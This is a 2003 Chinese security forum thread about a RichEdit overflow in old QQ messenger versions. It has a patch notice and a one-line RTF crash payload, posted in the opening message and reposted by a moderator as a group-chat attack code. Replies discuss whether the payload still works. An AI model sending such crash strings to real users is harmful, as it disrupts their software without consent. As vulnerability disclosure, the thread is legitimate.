|
作者: wushenmin [wushenmin] 论坛用户 | 登录 |
漏洞涉及的QQ版本为: QQ2003III测试版、QQ2003II、QQ2003、QQ2000c 漏洞修补方法: 运行本安全补丁,更新QQ安装目录内的riched20.dll文件。 http://soft.juntuan.net 攻击代码: {\urtf1\ansi\ansicpg936\deff0\deflanq1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}} \fs1800000000000000000000000000000 说明: 我们在QQ2000c、QQ2003、QQ2003II和QQ2003III测试版中发现一个由于Richedit代码页溢出所引起的严重安全漏洞。例如,攻击者可以发送一个溢出代码,这个代码将导致QQ非法退出。该漏洞涉及的QQ版本为:QQ2003III测试版、QQ2003II、QQ2003、QQ2000c。漏洞修补方法:运行本安全补丁,更新QQ安装目录内的riched20.dll文件。同时,我们对腾讯公司欺骗用户的行为,表示愤慨。PS:不知道腾讯所谓的QQ2003II已经修正该BUG,到底修正了什么。 作者/发行商: 木子工作室 |
地主 发表时间: 03-12-27 20:56 |
回复: dreamone [dreamone] 论坛用户 | 登录 |
郁闷, 这种代码过时了.新版本都没用了 |
B1层 发表时间: 03-12-27 21:20 |
回复: wushenmin [wushenmin] 论坛用户 | 登录 |
可以用也 只是补丁而已 |
B2层 发表时间: 03-12-27 23:01 |
回复: abctm [abctm] 版主 | 登录 |
QICQ群攻击代码 {\urtf1\ansi\ansicpg936\deff0\deflanq1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}} \fs1800000000000000000000000000000 |
B3层 发表时间: 03-12-27 23:02 |
回复: caoxingqi [caoxingqi] 论坛用户 | 登录 |
自己的QQ会被强行下线,大家别试了 |
B4层 发表时间: 03-12-29 11:32 |
回复: q70213526 [q70213526] 版主 | 登录 |
唉・・・ |
B5层 发表时间: 03-12-29 12:51 |
回复: wl555 [wl555] 论坛用户 | 登录 |
不行啊 |
B6层 发表时间: 03-12-29 13:15 |
回复: lang520 [lang520] 论坛用户 | 登录 |
行不行呀!! |
B7层 发表时间: 03-12-29 15:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号